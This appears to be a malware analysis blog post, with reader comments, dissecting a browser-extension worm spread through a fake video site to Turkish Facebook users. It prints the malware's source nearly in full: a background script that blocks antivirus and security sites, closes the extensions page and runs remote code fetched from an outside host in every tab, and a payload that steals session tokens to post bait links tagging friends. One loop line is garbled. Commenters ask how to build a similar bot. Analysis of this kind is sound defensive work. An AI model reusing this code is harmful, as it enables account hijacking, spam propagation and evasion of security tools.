videotr.in (Facebook spreading browser extension proxied by cloudflare)

This is aimed at Turkish Facebook users. The scripts used by the extension are hosted over several domains.

The infection starts at the site hxxp://www.videotr.in, which plays a short video clip. The video is then interrupted and the user is urged to run a downloaded exe, supposedly to fix the playback issue.


The exe creates a Chrome extension from files listed at hxxp://www.likef.biz/ask.txt and adds it to Chrome.

background.js
// Request filter: cancels any request whose URL contains one of the strings
// in `ibneler` (a hoisted `var`, so it exists by the time the listener fires).
// The only local entry is facebook.com/csp.php — presumably Facebook's
// Content-Security-Policy report endpoint, so violation reports caused by the
// injected script never reach Facebook. Organik() later extends the list from
// a remote server.
chrome.webRequest.onBeforeRequest.addListener(
        function (details) {
                var url = details.url;
                // Substring match, not an origin check: a URL that merely
                // contains the entry anywhere is cancelled.
                for (var i = 0; i < ibneler.length; i++) {
                        if (url.indexOf(ibneler[i]) > -1) {
                                return {
                                        cancel: true
                                };
                        }
                }
        }, {
                urls: ["<all_urls>"]
        }, ["blocking"]);
// Blocklist of URL substrings: seeded here, appended to by Organik().
var ibneler = [
        'https://www.facebook.com/csp.php'
];
// Fetches a JSON array of {uri: ...} objects from www.upjs.net and appends
// every `uri` value to the `ibneler` blocklist used by the webRequest
// listener. The random `amtasak` query value is presumably a cache-buster.
// Parse failures are swallowed, so a non-JSON response simply leaves the
// list unchanged. Network indicator: GET http://www.upjs.net/ajax/get.js
// (plaintext HTTP) shortly after the extension starts.
function Organik() {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function () {
                if (xhr.readyState == 4) {  // DONE; the HTTP status is never checked
                        try {
                                JSON.parse(xhr.responseText).forEach(
                                        function (d) {
                                                if (d.uri) {
                                                        ibneler.push(d.uri);
                                                }
                                        });
                        } catch (e) {}  // best-effort: any error is ignored
                }
        };
        xhr.open("GET",
                'http:\/\/www.upjs.net/ajax/get.js?amtasak=' +
                Math.random() * 999999, true);
        xhr.send();
}
Organik();
// Anti-removal: closes any tab whose URL exactly equals one of three
// Chrome/Opera extension-management page spellings, keeping the user away
// from the uninstall UI.
chrome.tabs.onUpdated.addListener(
        function (tabid, x, tab) {
                if (tab.url ==
                        'chrome://chrome/extensions' ||
                        tab.url == 'opera://extensions' ||
                        tab.url == 'chrome://extensions/'
                ) {
                        chrome.tabs.remove(tab.id);
                }
        });
// Remote code loader: on every tab update, downloads JavaScript from
// www.jsup.us/user.php and runs it in the tab via
// chrome.tabs.executeScript({code: ...}). Only devtools:// URLs are skipped;
// the response is neither validated nor integrity-checked, so whoever
// controls that host controls what runs in every page. Network indicator:
// GET http://www.jsup.us/user.php (plaintext HTTP) on each tab update.
chrome.tabs.onUpdated.addListener(function (tabId) {
        chrome.tabs.get(tabId, function (tab) {
                {
                        var xhr = new XMLHttpRequest();
                        xhr.onreadystatechange = function () {
                                if (xhr.readyState == 4) {
                                        if (tab.url.indexOf('devtools://') < 0) {
                                                chrome.tabs.executeScript(tab.id, {
                                                        code: xhr.responseText
                                                });
                                        }
                                }
                        }
                        xhr.open('GET', 'http://www.jsup.us/user.php');
                        xhr.send();
                }
        })
});
Script.js
// Visitor-tracking beacon (whos.amung.us): fires one image request unless an
// element with id "amung" already exists. The user.php payload below repeats
// the same check with a different key. Network indicator:
// GET http://whos.amung.us/pingjs/?k=z8l4ub8fvjhz
if(!document.getElementById('amung')){
new Image().src = 'http://whos.amung.us/pingjs/?k=z8l4ub8fvjhz';
}

Background.js loads a list of domains and URL paths from hxxp://www.upjs.net/ajax/get.js and cancels any request whose URL contains one of them. It also closes any tab that opens the Chrome or Opera extensions page.

get.js
[{"uri":"virustotal.com"},{"uri":"avast.com"},{"uri":"eset.com"},{"uri":"microsoft.com"},{"uri":"virusscan.jotti.org"},{"uri":"jotti.org"},{"uri":"avg.com"},{"uri":"kaspersky.com.tr"},{"uri":"kaspersky.com"},{"uri":"facebook.com/ajax/webstorage/process_keys.php"},{"uri":"facebook.com/checkpoint/malware/cr_ext_config"},{"uri":"facebook.com/checkpoint/malware/cr_ext_log"},{"uri":"sansurcrx.com"},{"uri":"dl.dropboxusercontent.com"},{"uri":"sosyalmedyakusu.com"},{"uri":"fiddle.jshell.net"},{"uri":"fei-coder.com"},{"uri":"docs.google.com"},{"uri":"drive.google.com"},{"uri":"orjinalmarket.net"},{"uri":"facebook.com/ajax/follow/unfollow_profile.php"},{"uri":"vuupc.com"},{"uri":"mcafee.com"},{"uri":"s3.amazonaws.com"},{"uri":"googlecode.com"}]


Kaspersky.com blocked

Background.js also loads additional javascript from hxxp://www.jsup.us/user.php. This has the Facebook spreading component.

user.php
// Content script pushed into every tab by background.js (chrome.tabs.executeScript).
// It only does anything useful inside a logged-in facebook.com page: it reads the
// victim's user id from the `c_user` cookie and the `fb_dtsg` form token from the
// DOM, then calls Facebook's internal AJAX endpoints with the victim's own session.
// Flow: up.php (link to spread) -> graph.facebook.com (victim's name)
//       -> buddy_list.php (online contacts) -> composer.php (wall post tagging them).
// Network indicators: GET http://whos.amung.us/pingjs/?k=bcpn2gdh64no,
// GET http://www.videotr.in/dropbox/up.php, GET https://graph.facebook.com/<id>,
// POST /ajax/chat/buddy_list.php?__a=1, POST /ajax/profile/composer.php.
if (!document.getElementById("amung")) {
    new Image().src = "http://whos.amung.us/pingjs/?k=bcpn2gdh64no";
}
var tarih = new Date();
var takip = Array("1661944612", "1625224768");  // two numeric ids; unused in this listing
// NOTE(review): this line is garbled in the captured copy (an assignment as the
// loop condition and an extra ")"). Given the localStorage write at the bottom,
// it presumably gated the whole run on the 'Post_<id>' timestamp — confirm
// against an original sample.
for (i = 0; i = localStorage['Post_' + profile_id])) {
    // n random characters from A-Z0-9; one is appended to each bait text in `u`.
    function rndchr(n) {
        var text = "";
        var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        for (var i = 0; i < n; i++) text += possible.charAt(Math.floor(Math.random() * possible.length));
        return text;
    }
    // Pool of Turkish bait texts for the wall post; the rndchr(1) suffix varies
    // each run, presumably so repeated posts do not look identical.
    var u = ["Canli yayinda giyilecek elbisemi Allah askina bu! " + rndchr(1) + " ", " is gercekten iyice cigrindan cikti ne olacak boyle bilmiyorum!" + rndchr(1) + " ", "Bunlar da hakli hic bir yetenegi olmayan insanlar sonucta bunlar!" + rndchr(1) + " ", " Bunlari kontrol eden kurum RTUK! gor artik bunlar ve bi cozum uret!" + rndchr(1) + " ", "Valla bunlarda kisilik falan kalmamis kardesim" + rndchr(1) + " ", "Kardesim coluk cocugumuz var bunlar iyice bozdu!" + rndchr(1) + " ", "Birakin artik bu isleri bizler akillandik yemiyoruz bu numaralari!" + rndchr(1) + " ", "Ben izledim kendimden utandim. sizde bir bakin sunlara" + rndchr(1) + " ", "Yeter biktik beee! Biz boyle izlemek istemiyoruz!" + rndchr(1) + " ", "Yaa arkadaslar bunlari kontrol eden bir kurum yokmu! " + rndchr(1) + " ", "Reyting ugruna her gun neler goruyoruz vallahi yazik!" + rndchr(1) + " ", "Bizim orf adetlerimizle hic bagdasmayan seyler bunlar!" + rndchr(1) + " ", "D\xFCn\'den Beri Ugra\u015Ft\u0131g\u0131m tek \u015Eey bu Video \u0130zleyin.", "Mutlaka \u0130zleyin g\xFCnlerdir ugra\u015F\u0131orum.", "Videomu \u0130zleyen Herkeze Te\u015Fekk\xFCrler.", "En Sevdiğim Arkadaşlarım :)", "Ben Bu Videoyu yapmak i\xE7in g\xFCnlerimi verdim kimse izlemior.", "Yeni yılınız kutlu olsun arkadaşlar :) :D", "2013 y\u0131l\u0131nda arkada\u015Flar\u0131m ile ge\xE7irdi\u011Fim en g\xFCzel anlar", "Benim videomu birtek noal baba izlesin dilek diledim", "Simdide İnanmayinda Goreyim :)", "Herkez Cesaret Edemez ..", "İste Size Bahsettigim Sirrim :)", "Cok Utaniyorum Ama Birde Siz \u0130zleyin L\xFCtfen", "Ne Kadar Cilgin Bir İnsanim Ben.", "Nasilda Tatliyim Ama..", "Dostlarimin Destegi Olmasaydi Gidemezdim..", "Destek Veren Tum Dostlarimi Kutluyorum", "Yetenek Sizsiniz T\xFCrkiye\'ye Kat\u0131ld\u0131m. 
\u0130zlerseniz Sevinirim", "Bunu Yapacagım Aklima Gelmezdi :)", "Destek Veren T\xFCm Arkadaslarima Tesekk\xFCr Ederim", "Sonunda Bunuda Yaptim ya Helal Olsun Bana", "Kim Derdiki Televizyona Cikacagım ?", "Taniyanlar Ne Kadar Cilgin Oldugumu Bilir :)"];
    // Post text for this run, chosen uniformly from `u`.
    var rand = u[Math.floor(u.length * Math.random())];
    // Victim's Facebook user id, taken from the c_user cookie (presumably the
    // login cookie). Throws a TypeError if the cookie is absent, which aborts
    // the script on non-logged-in pages.
    var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();

    // Random alphanumeric string of `uzunluk` characters. `mtn`, `ret` and `i`
    // are assigned without `var`, so they leak into the global scope.
    function rastgele(uzunluk) {
        mtn = "ABCDEFGHIJKLMNOPRSTUVYZXabcdefghijklmnoprstuvyzx0123456789";
        ret = "";
        for (i = 0; i < uzunluk; i++) {
            ret += mtn[Math.floor(Math.random() * 57)];
        }
        return ret;
    }
    // Step 1: fetch the current spreading URL from the C2 and append a
    // 250-character random query string, then start the chain with topla().
    var link = "";
    var xhr = new XMLHttpRequest();
    xhr.open("GET", 'http://www.videotr.in/dropbox/up.php', true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState == 4) {
            link = xhr.responseText + "?" + rastgele(250);
            topla();
        }
    }
    xhr.send();

    // Step 2: look up the victim's display name via the public Graph API
    // (no error handling: a non-JSON response throws inside the callback).
    function topla() {
        var get = new XMLHttpRequest();
        get.onreadystatechange = function () {
            if (get.readyState == 4) {
                var response = JSON.parse(get.responseText);
                var isim = response.name;
                online(isim);
            }
        };
        get.open("GET", "https://graph.facebook.com/" + profile_id, true);
        get.send();
    }
    friends = [];  // global; filled by online(), read by paylas()

    // Step 3: POST to Facebook's chat buddy-list endpoint with the victim's id
    // and fb_dtsg token, strip the "for (;;);" anti-JSON-hijacking prefix, and
    // collect the ids of currently-available contacts into `friends`. Any
    // error is swallowed and paylas() runs regardless (possibly with an empty
    // list). `toplam` is computed but never used; `kisi` is an implicit global.
    function online(isim) {
        var get = new XMLHttpRequest();
        get.onreadystatechange = function () {
            if (get.readyState == 4) {
                try {
                    var veri = JSON.parse(get.responseText.replace("for (;;);", ""));
                    var toplam = Object.keys(veri.payload.buddy_list.nowAvailableList).length;
                    for (kisi in veri.payload.buddy_list.nowAvailableList) {
                        friends.push({
                            id: kisi
                        });
                    }
                } catch (close) {}
                paylas(isim, friends)
            }
        };
        var params = "user=" + profile_id + "&fetch_mobile=false&__user=" + profile_id + "&__a=1&__req=2&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
        get.open("POST", "/ajax/chat/buddy_list.php?__a=1", true);
        get.send(params);
    }

    // Step 4: build a composer.php form body imitating the share dialog
    // (fixed link_metrics/composer_metrics fields), posting `rand` as the
    // message with a link attachment to `link`, a title built from the
    // victim's name and a youtube.com-looking summary/image, and tagging
    // friends. Sent with the victim's fb_dtsg token; the response is ignored.
    // Values are concatenated raw — nothing is URL-encoded.
    function paylas(isim, friends) {
        if (link != "undefined" || link != "") {
            var http = new XMLHttpRequest();
            http.onreadystatechange = function () {
                if (http.readyState == 4) {}
            };
            var params = "";
            params = "fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
            params += "&xhpc_context=home";
            params += "&xhpc_ismeta=1";
            params += "&xhpc_timeline=";
            params += "&xhpc_composerid=u_jsonp_3_3";
            params += "&xhpc_litestand=1";
            params += "&xhpc_targetid=" + profile_id;
            params += "&clp={\"cl_impid\":\"a4eb8ac2\",\"clearcounter\":0,\"elementid\":\"u_jsonp_3_g\",\"version\":\"x\",\"parent_fbid\":" + profile_id + "}";
            params += "&xhpc_message_text=" + rand;
            params += "&xhpc_message=" + rand;
            params += "&aktion=post";
            params += "&app_id=2309869772";
            params += "&attachment[params][urlInfo][canonical]=" + link;
            params += "&attachment[params][urlInfo][final]=" + link;
            params += "&attachment[params][urlInfo][user]=" + link;
            params += "&attachment[params][title]=" + isim + " :Yazıklar olsun izlerken içim gitti ya.";
            params += "&attachment[params][summary]=www.youtube.com";
            params += "&attachment[params][images][0]=https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn1/1525624_180057068859680_248847473_n.jpg";
            params += "&w=100";
            params += "&h=100";
            params += "&url=https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn1/1525624_180057068859680_248847473_n.jpg";
            params += "&cfs=1";
            params += "&upscale";
            params += "&attachment[params][medium]=106";
            params += "&attachment[params][url]=" + link;
            params += "&attachment[type]=100";
            params += "&link_metrics[source]=ShareStageExternal";
            params += "&link_metrics[domain]=youtube.com";
            params += "&link_metrics[base_domain]=youtube.com";
            params += "&link_metrics[title_len]=51";
            params += "&link_metrics[summary_len]=260";
            params += "&link_metrics[min_dimensions][0]=70";
            params += "&link_metrics[min_dimensions][1]=70";
            params += "&link_metrics[images_with_dimensions]=1";
            params += "&link_metrics[images_pending]=0";
            params += "&link_metrics[images_fetched]=0";
            params += "&link_metrics[image_dimensions][0]=325";
            params += "&link_metrics[image_dimensions][1]=325";
            params += "&link_metrics[images_selected]=1";
            params += "&link_metrics[images_considered]=1";
            params += "&link_metrics[images_cap]=10";
            params += "&link_metrics[images_type]=images_array";
            params += "&composer_metrics[best_image_w]=100";
            params += "&composer_metrics[best_image_h]=100";
            params += "&composer_metrics[image_selected]=0";
            params += "&composer_metrics[images_provided]=1";
            params += "&composer_metrics[images_loaded]=1";
            params += "&composer_metrics[images_shown]=1";
            params += "&composer_metrics[load_duration]=16";
            params += "&composer_metrics[timed_out]=0";
            params += "&composer_metrics[sort_order]=";
            params += "&composer_metrics[selector_type]=UIThumbPager_6";
            // Tag count: every collected friend when there are fewer than 200,
            // otherwise only the first 150. `limit` and `i` are implicit globals.
            if (friends.length < 200) {
                limit = friends.length;
            } else {
                limit = 150;
            }
            for (i = 0; i < limit; i++) {
                params += '&composertags_with[' + i + ']=' + friends[i].id;
            }
            params += "&is_explicit_place=";
            params += "&composertags_place=";
            params += "&composertags_place_name=";
            params += "&tagger_session_id=1388007674";
            params += "&action_type_id[0]=";
            params += "&object_str[0]=";
            params += "&object_id[0]=";
            params += "&hide_object_attachment=0";
            params += "&og_suggestion_mechanism=";
            params += "&composertags_city=";
            params += "&disable_location_sharing=false";
            params += "&composer_predicted_city=114515998560505";
            params += "&audience[0][value]=80";
            params += "&nctr[_mod]=pagelet_composer";
            params += "&__user=" + profile_id;
            params += "&__a=1";
            params += "&__dyn=7n8a9EAMBlClUlgDxqiykUUxoshEK49oKiWFamiFo";
            params += "&__req=17";
            params += "&__rev=1058441";
            params += "&ttstamp=";
            http.open("POST", "/ajax/profile/composer.php", true);
            http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            http.send(params);
        }
    }
    // Chrome only: store now + 100 s (1000*10*10 ms) under localStorage['Post_<id>'].
    // Presumably the throttle that the garbled `for` condition above reads back.
    if (navigator.userAgent.indexOf("Chrome") > 0) {
        tarih.setTime(tarih.getTime() + 1000 * 10 * 10);
        localStorage['Post_' + profile_id] = tarih.getTime();
    }
}

Updated links for spreading are obtained from hxxp://www.videotr.in/dropbox/up.php

The shortened URL leads to a page hosted on Dropbox.
    

    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
    <head>
            <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
            <title></title>
    </head>
    <body>
    <script type="text/javascript">
    // Crude user-agent sniff. The single-letter aliases are just
    // navigator.userAgent.indexOf spelled as string-keyed property accesses
    // (light obfuscation); f, g, h and i are declared but never used here.
    // Mobile WebKit (except iPad), Opera Mini and IEMobile are sent to the
    // goo.gl short link (per the write-up, mobil.html on S3); everything else
    // is bounced back to www.videotr.in. Assigning top.location navigates the
    // top-level window, so the redirect also works from inside a frame.
    var a = navigator,
            b = "userAgent",
            c = "indexOf",
            f = "&m=1",
            g = "(^|&)m=",
            h = "?",
            i = "?m=1";
    if (-1 != a[b][c]("Mobile") && -1 != a[b][c]("WebKit") && -1 == a[b][c]("iPad") || -1 != a[b][c]("Opera Mini") || -1 != a[b][c]("IEMobile")) {
    top.location="http://goo.gl/wXXcpZ";
    }else{
    top.location = "http://www.videotr.in";
    }
    </script>
    </body>
    </html>


Mobile browsers are redirected to hxxp://mobiltrafikmt.s3.amazonaws.com/mobil.html and all others are sent to videotr.in for the infection cycle to start again.

mobil.html
<script src="http://code.jquery.com/jquery-latest.js" type="text/javascript"><!--mce:2--></script>
<script>
// Returns "Android" or "iPhone" based on a case-insensitive user-agent match,
// and undefined for anything else — the caller's fall-through branches rely
// on that third outcome.
function detectmob() { 
 if( navigator.userAgent.match(/Android/i)){
    return "Android";
  }
  if( navigator.userAgent.match(/iPhone/i)){
    return "iPhone";
  }
}

// Geo/carrier routing via an ipinfo.io JSONP lookup (plaintext HTTP).
// Turkish visitors are split by mobile carrier — TURKCELL / Vodafone / AVEA,
// matched as substrings of the `org` field — and otherwise by OS; visitors
// from any other country are split by OS only. Every branch is a relative
// page on the same host. Nothing runs if the lookup fails.
$.get("http://ipinfo.io", function(response) {
    if(response.country=="TR")
    {
    // Turkey (original comment "TÜRKİYE", mis-encoded in the capture)
    if(response.org.indexOf("TURKCELL")>0){
    top.location.href = 'turkcell.html';
    }else if(response.org.indexOf("Vodafone")>0){
    top.location.href = 'vodofone.html';
    }else if(response.org.indexOf("AVEA")>0){
    top.location.href = 'avea.html';
    }else{
    if(detectmob()=="Android"){
    top.location.href = 'androidwifi.html';
    }else if(detectmob()=="iPhone"){
    top.location.href = 'iphonewifi.html';
    }else{
    top.location.href = 'trweb.html';
    }
    }
    }else{
    // Abroad (original comment "YURTDIŞI", mis-encoded in the capture)
    if(detectmob()=="Android"){
    top.location.href = 'yurtdisi-anroid.html';
    }else if(detectmob()=="iPhone"){
    top.location.href = 'yurtdisi-ios.html';
    }else{
    top.location.href = 'yurtdisiweb.html';
    }
    }
}, "jsonp");
</script>
Mobile browsers are separated by country, mobile carrier and phone OS, and pushed through a network of affiliate links.


Hendrac7 said...

videotr.in is non aktif bro , can you explain again to make BOT like this ??? my email : hendrac7@gmail.com

Kodran Piraj said...

how to convert crx to exe please ?

Anonymous said...

what info does hxxp://www.videotr.in/dropbox/up.php contain? Does it serve a json file?
